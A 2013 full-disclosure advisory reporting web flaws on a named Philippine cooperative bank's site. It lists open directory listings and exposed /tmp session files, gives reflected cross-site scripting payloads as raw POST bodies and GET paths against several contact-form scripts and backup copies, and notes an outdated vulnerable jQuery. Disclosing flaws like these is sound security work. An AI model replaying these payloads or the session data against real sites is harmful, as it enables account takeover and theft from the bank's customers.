FICOBank Directory Listing Information Disclosure / Cross Site Scripting / Jquery Old Version Vulnerable


Report-Timeline:
================

23-08-2013 Advisory

Response:"Our country does not have the same laws as their own and we do not consider to be security flaws the data you send us.
                  Thank you very much"

                    ( /ME I don´t understand this response.. Is it a joke? )

20-08-2013 Full Disclosure


I-VULNERABILITY
-------------------------

#Title: FICOBank Directory Listing Information Disclosure / Cross Site Scripting / Jquery Old Version Vulnerable

#Vendor:http://www.ficobank.com / http://ficobank.com

#Author:Juan Carlos García (@secnight)

#Follow me 

 http://www.highsec.es
Twitter:@secnight



II-Introduction:
=============

The First Isabela Cooperative Bank (FICOBank) is one of the pioneer and prominent cooperative banks in the Philippines.
Its origin is deeply rooted in the community, as it was organized 36 years ago by two cooperatives and 47 samahang nayons, 
which represented the farmers who have limited resources and access to banking services. From a molehill-size cooperative rural
bank that it opted to be, it elevated to a mountain-high cooperative bank, 
as it can now lay claim to a resource base of over Php 2.37 billion (as of December 31, 2012).

-------------------------

III-PROOF OF CONCEPT
====================

Attack details
--------------

Directory Listing
*****************

The web server is configured to display the list of files contained in this directory.
This is not recommended because the directory may contain files that are not normally 
exposed through links on the web site.A user can view a list of all files from this 
directory possibly exposing sensitive information.

Affected items

http://ficobank.com/annualreport/

/annualreport 
/annualreport/_notes 
/annualreport/annualreport 
/Assets4Sale 
/Assets4Sale/a4sale 
/Assets4Sale/a4sale/_notes 
/contact 
/contact/_notes 
/contact/html-contact-form-captcha 
/contact/html-contact-form-captcha/_notes 
/contact/html-contact-form-captcha/scripts 
/contact/html-contact-form-captcha/scripts/_notes 
/contact/scripts 
/contact/scripts/_notes 
/contact/scripts-old 
/contact/scripts-old/_notes 
/DepositProducts 
/DepositProducts/_notes 
/Ficonnect 
/flash 
/flash/_notes 
/images 
/images/awards 
/images/images 
/images/jobopening 
/images/jobopening/_notes 
/images/officer 
/images/signature 
/images/signature/_notes 
/images/slides 
/Leadership 
/LoanProducts 
/news 
/news/_notes 
/OtherServices 
/OtherServices/_notes 
/scripts 
/scripts/_notes 
/Stylesheet 
/Stylesheet/_notes 

Temporary file/directory

Affected items

http://www.ficobank.com/tmp/

/tmp 
/tmp/mailError.log 
/tmp/sess_secnightsessionfixation 
/tmp/sess_b35e89c88df72a4c589a5a8e1a495594 
/tmp/sess_f277f2a2689ac1ee7b04b527b80b9b7c 
/tmp/untitled

File Lock

These lock files often contain usernames of the user that
has locked the file. Username harvesting can be done using this technique...


http://www.ficobank.com/DepositProducts/

Cross Site Scripting
****************

Cross site scripting (also referred to as XSS) is a vulnerability that allows 
an attacker to send malicious code (usually in the form of Javascript) to another user.
Because a browser cannot know if the script should be trusted or not, it will execute 
the script in the user context allowing the attacker to access any cookies or session tokens
retained by the browser. 


Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into
a vulnerable application to fool a user in order to gather data from them.An attacker can steal the
session cookie and take over the account,impersonating the user.It is also possible to modify the content
of the page presented to the user. 


Affected items

/contact/contactus.php 

URL encoded POST input email was set to sample%40email.tst' onmouseover=prompt(947854) bad='
The input is reflected inside a tag parameter between single quotes.


Variant email(2)

6_letters_code=94102&email=sample%2540email.tst%27%20onmouseover%3dprompt%28947854%29%20bad%3d%27&message=20&name=secnight&submit=Submit

6_letters_code=94102&email=sample%2540email.tst%27%20onmouseover%3dprompt%28924627%29%20bad%3d%27&message=20&name=jjxlxmqv&submit=Submit



Variant Name

URL encoded POST input name was set to secnight'and jjxlxmqv' onmouseover=prompt(991722) bad='
The input is reflected inside a tag parameter between single quotes.

POST /contact/contactus.php 

6_letters_code=94102&email=sample%40email.tst&message=20&name=secnight%27%20onmouseover%3dprompt%28991722%29%20bad%3d%27&submit=Submit
6_letters_code=94102&email=sample%40email.tst&message=20&name=jjxlxmqv%27%20onmouseover%3dprompt%28991722%29%20bad%3d%27&submit=Submit


/contact/email.php 

URI was set to #" onmouseover=prompt(919235) //
The input is reflected inside a tag parameter between double quotes.

GET /contact/email.php/%F6%22%20onmouseover=prompt(919235)%20//


/contact/email.php.bak 

URI was set to #" onmouseover=prompt(994575) //

GET /contact/email.php.bak/%F6%22%20onmouseover=prompt(994575)%20// 


/contact/email.php.BAK

URI was set to #" onmouseover=prompt(924567) //

The input is reflected inside a tag parameter between double quotes.


GET /contact/email.php.BAK/%F6%22%20onmouseover=prompt(924567)%20//


/contact/html-contact-form-captcha/html-contact-form.php (4)

URL encoded POST input email was set to sample%40email.tst' onmouseover=prompt(913822) bad='

POST /contact/html-contact-form-captcha/html-contact-form.php

6_letters_code=94102&email=sample%2540email.tst%27%20onmouseover%3dprompt%28913822%29%20bad%3d%27&message=20&name=fpfvlamn&submit=Submit


/contact/samplexyz.php (7)

URL encoded POST input contactname was set to pdnfeddf" onmouseover=prompt(969944) bad="

POST /contact/samplexyz.php

contactname=pdnfeddf%22%20onmouseover%3dprompt%28969944%29%20bad%3d%22&email=sample%40email.tst&subject=1

Variants contactname,email,subject


/contact/samplexyz.php.bak 

URI was set to #" onmouseover=prompt(959358) //
The input is reflected inside a tag parameter between double quotes.

GET /contact/samplexyz.php.bak/%F6%22%20onmouseover=prompt(959358)%20// 


/contact/samplexyz.php.BAK

URI was set to #" onmouseover=prompt(966989) //

GET /contact/samplexyz.php.BAK/%F6%22%20onmouseover=prompt(966989)%20//


/contactus.php(4)

Variant email, name

email(3)

URL encoded POST input email was set to sample%40email.tst' onmouseover=prompt(971885) bad='


6_letters_code=94102&email=sample%2540email.tst%27%20onmouseover%3dprompt%28971885%29%20bad%3d%27&message=20&name=bxaskxpx&submit=Submit

name(1)

URL encoded POST input name was set to iwelgyng' onmouseover=prompt(991324) bad='

6_letters_code=94102&email=sample%40email.tst&message=20&name=iwelgyng%27%20onmouseover%3dprompt%28991324%29%20bad%3d%27&submit=Submit


Jquery Old Version Vulnerable
***************************

jQuery JavaScript Library v1.4.2

This problem was fixed in jQuery 1.6.3.

This page is using an older version of jQuery that is vulnerable to a Cross Site Scripting vulnerability.
Many sites are using to select elements using location.hash that allows someone to inject 
script into the page.

$("#id") is css selector, $("<img>") is createElement, and $("#<img>") is createElement too.


Affected items

/OtherServices/fade.min.js 


GET /OtherServices/fade.min.js 

Response:

HTTP/1.1 200 OK
Date: Fri, 23 Aug 2013 15:48:45 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml",
CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 13 Dec 2011 07:09:36 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Age: 0
Connection: keep-alive
Server: YTS/1.20.28


/OtherServices/jquery.fade.js 


GET /OtherServices/jquery.fade.js 
jquery_xss/#<img src=/ onerror=alert(1)>

Response

HTTP/1.1 200 OK
Date: Fri, 23 Aug 2013 15:48:46 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 13 Dec 2011 07:09:52 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Age: 0
Connection: keep-alive
Server: YTS/1.20.28
Content-Length: 72174


/scripts/fade.min.js 


GET /scripts/fade.min.js 

Response

HTTP/1.1 200 OK
Date: Fri, 23 Aug 2013 15:48:46 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Thu, 11 Jul 2013 03:44:10 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Age: 0
Connection: keep-alive
Server: YTS/1.20.28
Content-Length: 72174


/scripts/jquery.fade.js 


GET scripts/jquery.fade.js 

Response

The same..


IV. CREDITS
-------------------------

This vulnerability has been discovered
by Juan Carlos García(@secnight)

Special Thanks: Perseo


V. LEGAL NOTICES
-------------------------

The Author accepts no responsibility for any damage
caused by the use or misuse of this information.